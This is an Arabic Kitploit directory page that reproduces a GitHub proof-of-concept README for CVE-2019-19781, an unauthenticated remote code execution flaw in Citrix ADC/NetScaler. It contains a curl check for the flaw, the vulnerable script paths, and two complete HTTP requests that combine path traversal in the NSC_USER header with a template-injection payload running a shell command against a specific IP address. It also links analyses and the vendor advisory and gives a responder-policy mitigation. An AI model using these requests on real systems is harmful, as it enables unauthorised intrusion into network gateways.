Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19781 — CVE-2019-19781 - استغلال تنفيذ تعليمات برمجية عن بُعد على Citrix ADC Netscaler | Kitploit
أدوات/GitHubGitHub/mpgn/cve-2019-19781
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالاستجابة للحوادثأداة الوصول عن بعد
GitHubmpgn/cve-2019-19781

CVE-2019-19781

CVE-2019-19781 - استغلال تنفيذ تعليمات برمجية عن بُعد على Citrix ADC Netscaler

عرض المستودع
15734منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-19781

تنفيذ الكود عن بُعد (RCE) في Citrix Application Delivery Controller وCitrix Gateway

تم تحديد ثغرة أمنية في Citrix Application Delivery Controller (ADC) المعروف سابقًا باسم NetScaler ADC وCitrix Gateway المعروف سابقًا باسم NetScaler Gateway، والتي، إذا تم استغلالها، قد تسمح لمهاجم غير مصادق بتنفيذ كود عشوائي.

تعديل: ماسح مؤشرات الاختراق لـ CVE-2019-19781 من Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

المنتجات المتأثرة:

  • Citrix ADC وCitrix Gateway الإصدار 13.0 جميع الإصدارات المدعومة
  • Citrix ADC وNetScaler Gateway الإصدار 12.1 جميع الإصدارات المدعومة
  • Citrix ADC وNetScaler Gateway الإصدار 12.0 جميع الإصدارات المدعومة
  • Citrix ADC وNetScaler Gateway الإصدار 11.1 جميع الإصدارات المدعومة
  • Citrix NetScaler ADC وNetScaler Gateway الإصدار 10.5 جميع الإصدارات المدعومة

image

التحقق من الضعف

root@kitploit:~
TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don’t have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" || echo "MITIGATED: $TARGET"

سكريبت Perl القابل للاستغلال

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

الاستغلال

يلزم طلبان فقط لاستغلال هذه الثغرة دون أي مصادقة!

الطلب الأول:

root@kitploit:~
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

الطلب الثاني:

root@kitploit:~
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

تحليل مفصل (باللغة الإنجليزية):

  • Craig Young => https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
  • @MDSecLabs => https://www.mdsec.co.uk/2020/01/deep-dive-in-to-citrix-adc-remote-code-execution-cve-2019-19781/
  • @mpgn_x64 => https://twitter.com/mpgn_x64/status/1214544993261674497

نشرة أمنية:

  • https://support.citrix.com/article/CTX267027

التصحيح (ليس تصحيحًا حقيقيًا)

  • https://support.citrix.com/article/CTX267679
root@kitploit:~
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 
تنزيل الأداة